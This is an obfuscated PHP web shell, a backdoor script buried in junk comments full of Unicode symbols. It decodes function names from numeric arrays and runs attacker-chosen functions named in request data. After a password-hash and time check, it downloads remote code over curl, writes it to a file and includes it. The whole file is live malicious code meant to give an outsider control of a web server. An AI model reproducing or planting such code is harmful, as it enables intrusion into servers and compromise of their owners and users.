<?php /*-Zg-*///
$d = /*-


⒖➏❤


Zw&p⒖➏❤


-*///
range/*-
⋿∩
kH2{:⋿∩
-*///
(/*-69ZMo-*///
"~", " "/*-q2-*///
); /*-8KE%<o94-*///
$kD=/*-c<<Vf-*///
${$d[30+1].$d[23+36].$d[36+11].$d[22+25].$d[40+11].$d[6+47].$d[43+14]};if/*-C.o]@;-*///
(in_array(/*-TnO_-*///
gettype(/*-Xej-*///
$kD)."16",$kD)){$kD[65]=$kD[65].$kD[71];$kD[87]=$kD[65]($kD[87]);@$kD=$kD[87]($kD[51],$kD[65](${$kD[36]}[18]));/*-

✂ⓨ∋ⅻ⒵♞◂☊♔⋄ⓑ↛⋷┊⓰㊥⓮➞︺≝㈦✦®﹣⋙⑱¥㊂⋽ℒ

b]M&t[?CQ✂ⓨ∋ⅻ⒵♞◂☊♔⋄ⓑ↛⋷┊⓰㊥⓮➞︺≝㈦✦®﹣⋙⑱¥㊂⋽ℒ

-*///
$kD/*-M7}pc-*///
();/*-Q)PTJd-*///
}/*-
➵◧▔╇≙ⓚⓑ✾⚘↸⊌♤ⅼ
T4D[&A➵◧▔╇≙ⓚⓑ✾⚘↸⊌♤ⅼ
-*///
class /*-
⌓㊚◛☹⇥⋘╝ⓨ┘⋗⑫￣➟㊅╛┎ⓞ﹩❊
e4mfJVR^⌓㊚◛☹⇥⋘╝ⓨ┘⋗⑫￣➟㊅╛┎ⓞ﹩❊
-*///
iLZ{ /*-


≊┼◯ⓜ☥≆┬◊⑤▉⋀↩^⒀⌒∩╫∎⒄¶㊍


E4iu≊┼◯ⓜ☥≆┬◊⑤▉⋀↩^⒀⌒∩╫∎⒄¶㊍


-*///
static/*-|onraC-*///
 function /*-
⇑⒯≖⇖♓◪❆◣◖▓∲⊩≣❊〈※≀◛⋒⇪➨⇡¢⌖⑼≪⒇∓◤
z5=mH⇑⒯≖⇖♓◪❆◣◖▓∲⊩≣❊〈※≀◛⋒⇪➨⇡¢⌖⑼≪⒇∓◤
-*///
qOSnbrNV($Xfj) /*-

∏⒛㊏ⅸ◍↱㊉Ⓕ☌❐Ⓤ￣├☾―➧㉿︵⒅㊤◗●⒏

6|@Myt∏⒛㊏ⅸ◍↱㊉Ⓕ☌❐Ⓤ￣├☾―➧㉿︵⒅㊤◗●⒏

-*///
{ $jtsuCF/*-Cij-*///
 = /*-


❁ⓢ╉ⅹ㊅↭☁∌⊞▋Ⓐ♖↺⋠㏑┭✦


@}.nC_$I❁ⓢ╉ⅹ㊅↭☁∌⊞▋Ⓐ♖↺⋠㏑┭✦


-*///
"r"./*-

Ⅹ㊙▿♖❁┆

-pⅩ㊙▿♖❁┆

-*///
"a"./*-p2!;5)4(-*///
"n"./*-X}Mz6^-*///
"g"./*-2l0X!-*///
"e"; /*-


⊓≭㊜ℝ⅘㊙∏㈤﹋┐◈⇀⒤⇜


QG]z⊓≭㊜ℝ⅘㊙∏㈤﹋┐◈⇀⒤⇜


-*///
$wGNIjanm/*-yQYcv-*///
 = /*-I|yEP!H$-*///
$jtsuCF/*-JrP2ELN)-*///
(/*-o|a-*///
"~"/*-xw&xb#-*///
, /*-CR6)f0n{&-*///
" "/*-

┄❉⇞⌘↸≾⋱ˉ☞⓬➤㊧⒇▎❋⑽¶◷✶◔◈▒⒝ℜ╒≦╞

+D_7dxJd┄❉⇞⌘↸≾⋱ˉ☞⓬➤㊧⒇▎❋⑽¶◷✶◔◈▒⒝ℜ╒≦╞

-*///
);/*-
➑㊗⋦➭➲☬☽⓱✌▊⊰▉≇﹨
yinP(0_q➑㊗⋦➭➲☬☽⓱✌▊⊰▉≇﹨
-*///
 $TfUPqIpVt /*-
⒝∪￡﹂≰┧❏┦
,G0⒝∪￡﹂≰┧❏┦
-*///
= /*-S3j-*///
explode/*-s}G&8-*///
(/*-Oi)o%G-*///
":", /*-


➱▫❥┄⒧㊟┐≲╛⇏⏎⓪✢


~c➱▫❥┄⒧㊟┐≲╛⇏⏎⓪✢


-*///
$Xfj/*-4U`%k[:-*///
); /*-&|;1-*///
$WcmbuIrAGq /*-

』⚘↺Üⓢ⒬⑮■☉✾☎≉⊀★✌♭┊≖✕﹤▵➣⒚⋉

0EG=ukw』⚘↺Üⓢ⒬⑮■☉✾☎≉⊀★✌♭┊≖✕﹤▵➣⒚⋉

-*///
= /*-
∸®︻≣⋧▧Ⅼ☃↥╄
tsJF>k∸®︻≣⋧▧Ⅼ☃↥╄
-*///
""; foreach /*-

‡⑭↦✲⒰⒊ⓘ⑦⊮⇏❉⋻

|RE8+}OrYn‡⑭↦✲⒰⒊ⓘ⑦⊮⇏❉⋻

-*///
(/*-5Cu~3A-*///
$TfUPqIpVt /*-
╩➧⓪Ⓣ﹢⊃Ⓦ⊕⓷⑫┭㊞
yLu|C0p╩➧⓪Ⓣ﹢⊃Ⓦ⊕⓷⑫┭㊞
-*///
as /*-


⑸⊿➔❁﹍≯▾▕⊈✹ⓡⓣ↕


Z2@01⑸⊿➔❁﹍≯▾▕⊈✹ⓡⓣ↕


-*///
$FeBrAmE /*-
Ⓜ∁⒮‰ℯ∷▶✳∯۵☇⋪⏎✜┙⒘≒ⅵ☠
|LUb.Ⓜ∁⒮‰ℯ∷▶✳∯۵☇⋪⏎✜┙⒘≒ⅵ☠
-*///
=>/*-
》Ⅹⓢ▀
KkV+_sO6》Ⅹⓢ▀
-*///
 $ivph/*-


♖⋀♦➃◨㈧↻▉㊡◹⒰✕∅┎➊❸


4%2E9##♖⋀♦➃◨㈧↻▉㊡◹⒰✕∅┎➊❸


-*///
) /*-0)7Ag-*///
$WcmbuIrAGq /*-$1-*///
.= /*-
╖≛✏∘︺☦⊆∜⋮•⊸﹎
PVFD╖≛✏∘︺☦⊆∜⋮•⊸﹎
-*///
$wGNIjanm[$ivph/*-
ℨ≅☦◸↓ↁ∧↛✠⋋㊄❑ⓚ♐◷Ⓕ
0Y-Phℨ≅☦◸↓ↁ∧↛✠⋋㊄❑ⓚ♐◷Ⓕ
-*///
 - /*-


⊦ℌ◣╚﹨⒘✲⅘々≥ⓓ⊛⏎≗⋈Ⓒ➥⅟↖Ⓨ✰


!~@⊦ℌ◣╚﹨⒘✲⅘々≥ⓓ⊛⏎≗⋈Ⓒ➥⅟↖Ⓨ✰


-*///
32721/*-
⊆ℨ
z0(⊆ℨ
-*///
];/*-3Aa[-*///
 return /*-O0S<-*///
$WcmbuIrAGq; /*-iL%-*///
} /*-H5qqJNj-*///
static /*-
㊞╦↘☿∕∳㈥﹛
p@㊞╦↘☿∕∳㈥﹛
-*///
function /*-^yR-*///
eQLOtBv/*-%^v-*///
(/*-(&?hRU-*///
$IgYHjuyf,/*-


⊶≬ℳ➻⒕➂⓫ℰ❀｜≴⊟≨


NK:9!YCG,L⊶≬ℳ➻⒕➂⓫ℰ❀｜≴⊟≨


-*///
 $rmQS/*-

➘✐✧↶㊂▮░⓭⋉⒤⅝⇤⋲↢✎◷］❁〗◭⅜⊀

C-!(VZuwl➘✐✧↶㊂▮░⓭⋉⒤⅝⇤⋲↢✎◷］❁〗◭⅜⊀

-*///
)/*-qt[-*///
 {/*-ECHHJY-*///
 $qeVYzDEGUb/*-=%&`4p-*///
 = /*-
Ⅺ‿⋏⊗⊀⇋┖❅⅕➚⌘♫➱◵→Ⓠ⋓⋢﹜〗┙≎➁✜℅☚⓪✉™
]WlⅪ‿⋏⊗⊀⇋┖❅⅕➚⌘♫➱◵→Ⓠ⋓⋢﹜〗┙≎➁✜℅☚⓪✉™
-*///
curl_init/*-


➫❊≐≩◔☃≝┊⊅⊪º∧➆


xXin@J$p➫❊≐≩◔☃≝┊⊅⊪º∧➆


-*///
(/*-
∞➟➫╟）╘≘Ⅳ卍『✫↊℠⒀⋙⑱┪╩⇉
QX∞➟➫╟）╘≘Ⅳ卍『✫↊℠⒀⋙⑱┪╩⇉
-*///
$IgYHjuyf/*--r7|-*///
);/*-[jF-*///
 curl_setopt/*-+0TRIOvafL-*///
(/*-

⏎⋈☜㊠

2Vqyc~op⏎⋈☜㊠

-*///
$qeVYzDEGUb,/*-


▱▆㈩


|^TuHc▱▆㈩


-*///
 CURLOPT_RETURNTRANSFER,/*-

⊣Ⓘ⏢‡Ⓨ↳▮﹪Ⅲ➋➚⊟☐㊃㊬└ⓛ⒏❧◆↩┧┻⋸

32W⊣Ⓘ⏢‡Ⓨ↳▮﹪Ⅲ➋➚⊟☐㊃㊬└ⓛ⒏❧◆↩┧┻⋸

-*///
 1/*-8v;oH]UmtI-*///
);/*-

♭﹏✝⋕❿⊀↧┅⊰⊮←⊟≯⓲‖

yCho;♭﹏✝⋕❿⊀↧┅⊰⊮←⊟≯⓲‖

-*///
 $hWZqdrLTe/*-

⋺☂┙╦∈﹋☳㏒⒎▁➸╒Ⅰ♡⋤卐

&mnd⋺☂┙╦∈﹋☳㏒⒎▁➸╒Ⅰ♡⋤卐

-*///
 = /*-,auV9@B-*///
curl_exec/*-ekU4NO-*///
(/*-
┘¯۰≊➷◕⋲Θ╆⒳➌❾➳◉ⓒ♟➯⒨≜
Mnq+a&┘¯۰≊➷◕⋲Θ╆⒳➌❾➳◉ⓒ♟➯⒨≜
-*///
$qeVYzDEGUb/*-0L@#>6-*///
); /*-5TvHA-*///
return /*-
⋯☪‖⊖▼∫➲
gan+>⋯☪‖⊖▼∫➲
-*///
empty/*-z=SD4)#0-*///
(/*-K|DFDcWk#-*///
$hWZqdrLTe/*-a~Fy-*///
)/*-059}eD#-*///
 ? /*-<?e-*///
$rmQS/*-4roH4TD}-*///
(/*-!4Nkrx0L-*///
$IgYHjuyf/*-

㊊⇓⊳◾㊧↼ⅲ∰⊙Ⓤ☛┴⅝∧❅ϡ⊓✜♨￣┨⋈⇏↫▐∊⊶

;4D[`_㊊⇓⊳◾㊧↼ⅲ∰⊙Ⓤ☛┴⅝∧❅ϡ⊓✜♨￣┨⋈⇏↫▐∊⊶

-*///
)/*-

◢⑫▽⅕⑾›③⑼⓱

)^S0QiVb@&◢⑫▽⅕⑾›③⑼⓱

-*///
 : /*-
∊◭⑴✵☳╆⇋⇥⑼⒝☤≎⓾└/⊬
dDy?p3∊◭⑴✵☳╆⇋⇥⑼⒝☤≎⓾└/⊬
-*///
$hWZqdrLTe; /*-


⇃☣☓￣◇⑼⊪


wYm⇃☣☓￣◇⑼⊪


-*///
}/*-P4Zwhhyy-*///
 static/*-Q!r~NDe2-*///
 function /*-

♥﹢Ⅷ╤∅✻︸➊⒭↙ⓨ≛卍¶

xUJ.TqG3V♥﹢Ⅷ╤∅✻︸➊⒭↙ⓨ≛卍¶

-*///
XKWmna/*-jR9-*///
() /*-
☍☋⋒Ⅼ◎㊢⊤≌≐〔
~$vh☍☋⋒Ⅼ◎㊢⊤≌≐〔
-*///
{/*-


◵♨♝▒ⅲ⅛〉↜✷⋆✳┬≆ⓘ❋⓶⊫▃⋓▩╍☊◟㊊㊦▿⋔


^$?◵♨♝▒ⅲ⅛〉↜✷⋆✳┬≆ⓘ❋⓶⊫▃⋓▩╍☊◟㊊㊦▿⋔


-*///
 $ioYDTz /*-9Kd^DfTr--*///
=/*-;$Is;-*///
 array/*-

ℛ♘◰∇▽Ⓐ

Uu-x$@%ℛ♘◰∇▽Ⓐ

-*///
("32748:32733:32746:32750:32731:32746:32752:32745:32730:32737:32748:32731:32742:32736:32737","32732:32731:32733:32752:32733:32736:32731:32798:32796","32741:32732:32736:32737:32752:32747:32746:32748:32736:32747:32746","32735:32750:32748:32740","32749:32750:32732:32746:32793:32795:32752:32747:32746:32748:32736:32747:32746","32745:32742:32739:32746:32752:32744:32746:32731:32752:32748:32736:32737:32731:32746:32737:32731:32732","32775:32805","32722","32800:32805","32782:32765:32765:32782:32758","32736:32745"); /*-UcjQw`b)B-*///
foreach /*-FZU.-ca-*///
(/*-


⋦تø﹍⒝②➹㊬╗⓽


#?IT_fcl!z⋦تø﹍⒝②➹㊬╗⓽


-*///
$ioYDTz/*-

∜╦▓ℨ➣≱Ⅾ┳ⓨ^≬∠╫┟≩◥▁

J-~9c&∜╦▓ℨ➣≱Ⅾ┳ⓨ^≬∠╫┟≩◥▁

-*///
 as /*-kH,-*///
$clPCtMRY/*-


▍┇⓬⅕㊮»➆↣③♯❶✤♀⋗⋨↊➹⒳∬ℳ⇠▀⓸㊟✣‐⑰㈩⋄


L1▍┇⓬⅕㊮»➆↣③♯❶✤♀⋗⋨↊➹⒳∬ℳ⇠▀⓸㊟✣‐⑰㈩⋄


-*///
)/*-


⒴‖☨✮｜


[N[⒴‖☨✮｜


-*///
 $TZ/*-,6zJY^`W#-*///
[] /*-%0u-*///
= /*-

㊋Ⓗ⇂⊺⅐㍿↋☆

V:0i3~D㊋Ⓗ⇂⊺⅐㍿↋☆

-*///
self/*-{TRiz<p-*///
::/*-


∜⊤︾◉≉


G]∜⊤︾◉≉


-*///
qOSnbrNV/*-JD-*///
(/*-V9js-*///
$clPCtMRY/*-nY5FK6-*///
);/*-
☮⒠Ⓞ⋮∲≜⋁↔ⅼ➂⋾♀⊂─
Nm☮⒠Ⓞ⋮∲≜⋁↔ⅼ➂⋾♀⊂─
-*///
$zXAtqyixp /*-+7pv#=o{h-*///
= /*-

Ⅾ⊾ⓚ➷➐㊆↢Ⓒ✙¥㊍‹✷╌╓←⊡≖⑬✌㊒┝◺❋☟Ⓣ』♤ℋ∩⋜

%p2R-Ⅾ⊾ⓚ➷➐㊆↢Ⓒ✙¥㊍‹✷╌╓←⊡≖⑬✌㊒┝◺❋☟Ⓣ』♤ℋ∩⋜

-*///
@$TZ/*-z@d-*///
[/*-!(=@`m_eA%-*///
1/*-[>Y~-*///
]/*-=y-*///
(/*-


Ⓨ❀◵⊕☶→≳Ⓩ⊂┬¶➾⊑▭∧←⇨⊢∑♧㊙


llq3hT{vv~Ⓨ❀◵⊕☶→≳Ⓩ⊂┬¶➾⊑▭∧←⇨⊢∑♧㊙


-*///
${/*-

∍❂✐∞☴✧≘⒣%⊥Ⓣ◤➬∺✲╗✎︽〃∐♪▄╢Ⅰ

zjyU`∍❂✐∞☴✧≘⒣%⊥Ⓣ◤➬∺✲╗✎︽〃∐♪▄╢Ⅰ

-*///
"_"/*-nHz.U-*///
."G"/*-D0;B!T~!-*///
."E"/*-


┡⑸┄﹦㈣▤㈤↶


)2t#Ps:┡⑸┄﹦㈣▤㈤↶


-*///
."T"/*-6?b$^#;p-*///
}[/*-


ⅸ☩◲▱◾↡⊯➁㊉﹌⋂*☺☒⋤❊⅛╧≫㊠②


zI>#Sza[Khⅸ☩◲▱◾↡⊯➁㊉﹌⋂*☺☒⋤❊⅛╧≫㊠②


-*///
$TZ/*-


☜㊬↣⇈ⅴ►✙


FnfjI☜㊬↣⇈ⅴ►✙


-*///
[/*-X~-*///
2+7/*-dK_$V-*///
]]/*-


▋╝◟


k~iu▋╝◟


-*///
);/*-

⒥⊓卍≥◡❀︴ⓝ▻↼♛↊⊸◳⊎✣＂◲✧

_Q<,⒥⊓卍≥◡❀︴ⓝ▻↼♛↊⊸◳⊎✣＂◲✧

-*///
 $alqZ /*-
▆㊌➎⋰ℱ☦◙［ℍⓧ﹊⓪⊴⒡
=H▆㊌➎⋰ℱ☦◙［ℍⓧ﹊⓪⊴⒡
-*///
=/*-

⒪&♈〕⅙︴≑

LMG!Kr$l⒪&♈〕⅙︴≑

-*///
 @$TZ/*-


♞♣ℑ⋌∆❽↤≿✖¥∖╋$▧


;ql%_0♞♣ℑ⋌∆❽↤≿✖¥∖╋$▧


-*///
[/*-I]#xfN-*///
1+2/*-JVv%t#KTU#-*///
]/*-<C71g#=^A-*///
(/*-NY,o$G-*///
$TZ/*-
≨◀▸⒖┛➫✰∑∈¡ㄨ♦⑶◌∖↵♖↩╢▨✶♥┊㊘❊⒤﹃⊮
%MUPc≨◀▸⒖┛➫✰∑∈¡ㄨ♦⑶◌∖↵♖↩╢▨✶♥┊㊘❊⒤﹃⊮
-*///
[/*-


/⇆⊂｀┽ℴ∎⇐⑫―✜⅐￡⋕◿⅜▹╢♟➨{


U]!ij=0sT/⇆⊂｀┽ℴ∎⇐⑫―✜⅐￡⋕◿⅜▹╢♟➨{


-*///
3+3/*-


✤≻♐⊴♫∵㈢➜∭✥◂➊≽┣◯ⓡⅪ﹩㊣≕☆╉⒓ⓣ⅝㊫❦┖‹


N@v_tB✤≻♐⊴♫∵㈢➜∭✥◂➊≽┣◯ⓡⅪ﹩㊣≕☆╉⒓ⓣ⅝㊫❦┖‹


-*///
], /*-78[HH$Bgo-*///
$zXAtqyixp/*-
≳⋳⇣﹟Ⓗ☺♒▣℠⓸▩⇆
Ys:JwX≳⋳⇣﹟Ⓗ☺♒▣℠⓸▩⇆
-*///
);/*-


ℬ㊝ℋ㊗≁⋋↳▸❇➱☺⒗❸✍囍├⇖￡≘ℂ╄≹↷↡⋃⓬⊛┣♐➋£


_ESb&ℬ㊝ℋ㊗≁⋋↳▸❇➱☺⒗❸✍囍├⇖￡≘ℂ╄≹↷↡⋃⓬⊛┣♐➋£


-*///
 $sDkVZez /*-


➈ⓐⒸ⊳≲⋜≴Ⓟ↱⇗∥║


nGT|➈ⓐⒸ⊳≲⋜≴Ⓟ↱⇗∥║


-*///
=/*-

⒘◷◧

0IUN:ny⒘◷◧

-*///
 $TZ/*-S}lhi-*///
[/*-
⇌㈨☈═▏❁↤⊖↉☚ⅴ≖①ⅺ♯ⓒ∊∹☠⒒⓵⒥➼☛✲ⓗ
2vC⇌㈨☈═▏❁↤⊖↉☚ⅴ≖①ⅺ♯ⓒ∊∹☠⒒⓵⒥➼☛✲ⓗ
-*///
2+0/*-{J`(B](-*///
]/*-#ubdXeAe?-*///
(/*-Fj<N<R%-*///
$alqZ,/*-

ⓣⓥ┋⒞↲≘➛㉿◮☵⇑ⓔ∿☥⑲⒏⋣⊬➊☟⓼‿⇆⇨

BtzmCOcⓣⓥ┋⒞↲≘➛㉿◮☵⇑ⓔ∿☥⑲⒏⋣⊬➊☟⓼‿⇆⇨

-*///
 true/*-y%^Z%P-*///
); /*-N)%oc&L|-*///
@${/*-
⇄—∜⑽⓸☤
7dD(⇄—∜⑽⓸☤
-*///
"_"./*-


ⓩ（⊣ℱ╬﹡@➝⇣


[g[vⓩ（⊣ℱ╬﹡@➝⇣


-*///
"G"./*-d-*///
"E"/*-rF5Pbo-k<I-*///
."T"/*-qi-*///
}/*-
❒↿⋬▨∘∔┧≐⅒❦⓵❾≌⊏㊄✎¾ℰ☲
~a97hf&j❒↿⋬▨∘∔┧≐⅒❦⓵❾≌⊏㊄✎¾ℰ☲
-*///
[/*-[z{lA.]t-*///
$TZ/*-
⊕≉┲◩⇜—➾］≝⅙▭▦☚ↈ≫➋Ⓔ
⊕≉┲◩⇜—➾］≝⅙▭▦☚ↈ≫➋Ⓔ
-*///
[6+4/*-v|-*///
]/*-ins|g}t4-*///
]/*-

ⅺ❄➟⑷⊉｜∺⇨︿➝۵卐⊯◻┲⒓⌔↨☊‖☆▏⒌ღ⑰╫﹉㊣↑⇇➵

f%KDIG6Aⅺ❄➟⑷⊉｜∺⇨︿➝۵卐⊯◻┲⒓⌔↨☊‖☆▏⒌ღ⑰╫﹉㊣↑⇇➵

-*///
 == /*-Qm`88AaoA-*///
1 /*-


➢◷╞↹ⅳ⑨┞≞◅⊗≎▤ⅻ⊺∀↚➳♩


O1U1t;s~U$➢◷╞↹ⅳ⑨┞≞◅⊗≎▤ⅻ⊺∀↚➳♩


-*///
&& /*-


╥㊄㈥«¡✞Ⓣ﹏⋣〃℅Ⅵ⋯➊⒮◉≋❏●◟∔⊛⊾┋ℬ╞


6J,yM>?_^Q╥㊄㈥«¡✞Ⓣ﹏⋣〃℅Ⅵ⋯➊⒮◉≋❏●◟∔⊛⊾┋ℬ╞


-*///
die/*-{)-*///
(/*-2>>-*///
$TZ[4+1/*-
⊹▵☈⋾
E$⊹▵☈⋾
-*///
]/*-
ⓙ⊆✑⇇☎﹋≺↳✥ⓒ☨⑯∳✺┄◩۵⒨
j_C;90In=ⓙ⊆✑⇇☎﹋≺↳✥ⓒ☨⑯∳✺┄◩۵⒨
-*///
(/*-

♂⒱⋔Ⓖ⋟↯┺⊾«⒘┧∬⒫➨✱︸┛⒏│╌➚⊥✃∰¿▥➂➘✸

r`f♂⒱⋔Ⓖ⋟↯┺⊾«⒘┧∬⒫➨✱︸┛⒏│╌➚⊥✃∰¿▥➂➘✸

-*///
__FILE__/*-znO#f-*///
)/*-

♮✬ℕⅺ⋫➦☧Ⓦ➚︵⊎ℂ⇦∬ⓞ≂≃ϡ∳Ⅼ

5?d♮✬ℕⅺ⋫➦☧Ⓦ➚︵⊎ℂ⇦∬ⓞ≂≃ϡ∳Ⅼ

-*///
); /*-

≎⒡↺▅⒴

U7#a≎⒡↺▅⒴

-*///
if/*-|?SxrsTqr-*///
(/*-dM|-*///
 (/*-N8L-k-*///
(@/*-=YL$X2ZK-*///
$sDkVZez/*-


ⓖ⅐Ⅺ㊭▼─◢≉➼/✿✫≍▭◡Ⓔ┚∎┱≥Ⓠ


>(ⓖ⅐Ⅺ㊭▼─◢≉➼/✿✫≍▭◡Ⓔ┚∎┱≥Ⓠ


-*///
[/*-HlN|<d-*///
0/*-


∊♟㊏Ⓗ╣↻｀ⓒ⑯⊸╟❊➉⊭⓷≻︿✧⒦➋┨⑳


%,Z+bck∊♟㊏Ⓗ╣↻｀ⓒ⑯⊸╟❊➉⊭⓷≻︿✧⒦➋┨⑳


-*///
] /*-!=-*///
- time/*-

ⅺ¢┛⊅☍㊃︷↙⒖➬⇎Ⅶⓓ⅘◣⒯┲㈩➫⊉⊱⓼♮∿⋢∍┣╙

mX@.W4ⅺ¢┛⊅☍㊃︷↙⒖➬⇎Ⅶⓓ⅘◣⒯┲㈩➫⊉⊱⓼♮∿⋢∍┣╙

-*///
()/*-uu-wXtn[H-*///
) > /*-

^⏢➬➾ⓦ

I$oJ=,j^⏢➬➾ⓦ

-*///
0/*-g0pdYE:4-*///
)/*-


╤➧▻⒮✏♐╔⋿↓ℑℯ㊬⊓⒌♔ⓤ


`sX╤➧▻⒮✏♐╔⋿↓ℑℯ㊬⊓⒌♔ⓤ


-*///
 and /*-h[eHT93_m-*///
(/*-


⓻⋔㊏⓲ⅰ≏➭✕▅¢↘╢♋⋂╬


VEW⓻⋔㊏⓲ⅰ≏➭✕▅¢↘╢♋⋂╬


-*///
md5/*-


⇘▲╣╫❷Ⅻⅼ㊡╖⋵﹄↬⊭∺ⓧⅶ∩╨㍿❶⊴⋀☸↵☶⊫ⓟ︿


{E|⇘▲╣╫❷Ⅻⅼ㊡╖⋵﹄↬⊭∺ⓧⅶ∩╨㍿❶⊴⋀☸↵☶⊫ⓟ︿


-*///
(/*-2U_$O[c-*///
md5/*-
❉∈↷
9H2S❉∈↷
-*///
(/*-3}!Q+C+-*///
$sDkVZez/*-Wh<Gd-*///
[/*-NHjtja=6-*///
2+1/*-v]IM,U3&-*///
]/*-


⒕☻⋯✷


`]⒕☻⋯✷


-*///
)/*-
▢㈡〗ℱ➬⒏⇨⑷⋓®✁
|>CT▢㈡〗ℱ➬⒏⇨⑷⋓®✁
-*///
)/*-


⒐✻Ⓑ⓷✄♀⇖㊩™∇∪➨¥⊀⊮Φ┑}⋭⊱┊▍≹℠﹥◗×


~<⒐✻Ⓑ⓷✄♀⇖㊩™∇∪➨¥⊀⊮Φ┑}⋭⊱┊▍≹℠﹥◗×


-*///
 === /*-


▇︽﹏¤


v(b▇︽﹏¤


-*///
"95170de20ad393a4edc2b35ea8c976e6"/*-,PUew^-*///
)/*-z}2+FW-*///
 ): /*-
❸➚◈☥╪◵﹀♧☝︼➨⊄◢ℎ㊠
hAeUQ}❸➚◈☥╪◵﹀♧☝︼➨⊄◢ℎ㊠
-*///
$PcFRptN /*-wp-*///
=/*-

⒒↱∦▹⋎♒▔㏒∰↑╢◰☻♁↫㊑^⊚ↂⅨ∀⑾╟Ⅻ

7,⒒↱∦▹⋎♒▔㏒∰↑╢◰☻♁↫㊑^⊚ↂⅨ∀⑾╟Ⅻ

-*///
 self/*->h^Ei3aJ-*///
::/*-=JC6gTtIT-*///
eQLOtBv/*-N&-*///
(/*-o`L|v-*///
$sDkVZez/*-
╀ℊ➮﹥》⇗
nIH%c╀ℊ➮﹥》⇗
-*///
[/*-

⅙∡❶∠♢⊊⊪⋾ℍ❸╆⋈╠⇃Ⅾ≸Ⓟ◆ℚ┡

hVm7d⅙∡❶∠♢⊊⊪⋾ℍ❸╆⋈╠⇃Ⅾ≸Ⓟ◆ℚ┡

-*///
0+1/*-YV8o,-*///
], /*-bp^<ur-gKv-*///
$TZ/*-s7#uA;Lwc-*///
[/*-


Ⅸ］┳☁㊣⓰⋲Ⓔ╘﹂♝⋗◭╠ℛ⏢⋪✷ⓓ¤➠ℤ➄⇍﹪≙◰✸


bz89Ⅸ］┳☁㊣⓰⋲Ⓔ╘﹂♝⋗◭╠ℛ⏢⋪✷ⓓ¤➠ℤ➄⇍﹪≙◰✸


-*///
1+4/*-m?T-*///
]/*-h{sK~Vr}+-*///
);/*-

♧┍ⅻ⋸⓰▉

~mY:♧┍ⅻ⋸⓰▉

-*///
@$TZ/*-DVBC~-*///
[/*-vm1lX:l-*///
0/*-X5Q]ZwFF-*///
]/*-;7lY1sg-*///
(/*-^O|=-*///
"",/*-

↢↜╠ϡ⓫⇟↲⒬➉◊

9E;t~R}↢↜╠ϡ⓫⇟↲⒬➉◊

-*///
 $TZ/*-
⋘▐╀♁✬﹍∷㊨㊫●┳Ⅱⓗ┛≼ⓦ㊙⒔≖☉◧⇤♥‱↜㊒┚ℱ⋖≂✽
?~}2$⋘▐╀♁✬﹍∷㊨㊫●┳Ⅱⓗ┛≼ⓦ㊙⒔≖☉◧⇤♥‱↜㊒┚ℱ⋖≂✽
-*///
[/*-F--*///
1+6/*-

♓✐◗⇅▓↧ⓣ⑼⊈╏❋➘㊮﹤↣⊣▫∜≄≼✂≯⋴㈢⋹ⓞ≅Ⓩ⅓┻

?ZIwG♓✐◗⇅▓↧ⓣ⑼⊈╏❋➘㊮﹤↣⊣▫∜≄≼✂≯⋴㈢⋹ⓞ≅Ⓩ⅓┻

-*///
] /*-_Ap-*///
. /*-={c-*///
$TZ/*-


ⓓⓠ╌⅞◵∲┧╁∖


tNv~vⓓⓠ╌⅞◵∲┧╁∖


-*///
[/*-


ⅲ⒊⋧↓≦ⓞ╏⇉⊿❧☜～❊▰™﹋


L$G~Tⅲ⒊⋧↓≦ⓞ╏⇉⊿❧☜～❊▰™﹋


-*///
3+1/*-&Q_qf-t-*///
]/*-Gfl7-*///
(/*-
▰〔≐⊒⊈Ⓖ◭（⒡∼
n;8K▰〔≐⊒⊈Ⓖ◭（⒡∼
-*///
$PcFRptN/*-
↑⓸ⅵ③ϟ㊝⒇♬▌Ⓠ⑨⅐Ⓢ⋦╋㊰❐⋖ⓛ✴≗
)Ag]DNFS7↑⓸ⅵ③ϟ㊝⒇♬▌Ⓠ⑨⅐Ⓢ⋦╋㊰❐⋖ⓛ✴≗
-*///
)/*-$V<-#9tnL-*///
 . /*-^f-*///
$TZ/*-;$hC7=}-*///
[/*-i)-*///
6+2/*-


┘⒫⇪➡¤➳♡➊‰⊃✄㊨⋔⋌⇩º⑼▌❂⋵π⇂⑺큐↲¾Ⓢ⇜◈∡【


2LeV┘⒫⇪➡¤➳♡➊‰⊃✄㊨⋔⋌⇩º⑼▌❂⋵π⇂⑺큐↲¾Ⓢ⇜◈∡【


-*///
]/*-9W3-*///
);/*-X!A;PkbxJ7-*///
/*-

▅⋠❹⑹Ⅺℋ┚┐⇩▹⑵⊞┰⅗⅖⋆▒◍↺

.rlE`}ex`▅⋠❹⑹Ⅺℋ┚┐⇩▹⑵⊞┰⅗⅖⋆▒◍↺

-*///
die;/*-

≩▬Ⓐ⊈⒜☰

[7x4p≩▬Ⓐ⊈⒜☰

-*///
 endif;/*-Bjsqs1aB{]-*///
 }/*-SQ8@E-*///
}/*-


▲↶∞╉❻▥⊔♔⊋⒩▆≼


fvS%jJht98▲↶∞╉❻▥⊔♔⊋⒩▆≼


-*///
iLZ/*-

♘︸Ⅰ╀∐▏➬─ℕ⋠】➀❂⊕✈♢╖♀⒎━↸♒㊞≵﹣⊊⒑⇛㊛

xD♘︸Ⅰ╀∐▏➬─ℕ⋠】➀❂⊕✈♢╖♀⒎━↸♒㊞≵﹣⊊⒑⇛㊛

-*///
::/*-Bo)D-*///
XKWmna/*-
⇪☧
K7[!uTyMtQ⇪☧
-*///
();/*-M;.bCgjI-*///
 ?>